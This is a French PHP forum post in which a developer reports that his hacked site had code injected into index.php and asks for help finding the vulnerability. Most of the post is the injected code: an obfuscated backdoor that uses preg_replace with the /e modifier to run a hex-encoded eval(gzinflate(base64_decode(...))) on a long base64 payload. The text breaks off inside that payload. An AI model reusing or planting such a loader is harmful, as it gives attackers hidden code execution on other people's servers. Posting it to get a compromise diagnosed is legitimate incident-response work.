IdentifiantMot de passe
Loading...
Mot de passe oublié ?Je m'inscris ! (gratuit)
Navigation

Inscrivez-vous gratuitement
pour pouvoir participer, suivre les réponses en temps réel, voter pour les messages, poser vos propres questions et recevoir la newsletter

Langage PHP Discussion :

Sécurité de site : injection de code


Sujet :

Langage PHP

  1. #1
    Candidat au Club
    Homme Profil pro
    Ingénieur développement logiciels
    Inscrit en
    Avril 2014
    Messages
    2
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 34
    Localisation : France, Rhône (Rhône Alpes)

    Informations professionnelles :
    Activité : Ingénieur développement logiciels
    Secteur : Bâtiment

    Informations forums :
    Inscription : Avril 2014
    Messages : 2
    Points : 2
    Points
    2
    Par défaut Sécurité de site : injection de code
    Bonjour à tous !

    J'ai créé un site internet en php. Et je viens de me rendre compte que le site c'est fait hacké. J'ai cherché d'où peut provenir la faille mais je n'ai pas trouvé.

    La seule chose que je peux dire c'est que le hackeur, à placer des lignes dans le fichier index.php. Dans une premier temps j'ai cherché des failles que j'aurai pu mettre comme les failles includes, mais je n'ai pas de ca dans mon site.

    Je remercie d'avance toutes les personnes qui m'aideront à trouver d'où peut provenir la faille.

    voici les ligne qui ont été placées :
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    <?php ob_start(); ?>
    <?php
    preg_replace("/.*/e","\x65\x76\x61\x6C\x28\x67\x7A\x69\x6E\x66\x6C\x61\x74\x65\x28\x62\x61\x73\x65\x36\x34\x5F\x64\x65\x63\x6F\x64\x65\x28'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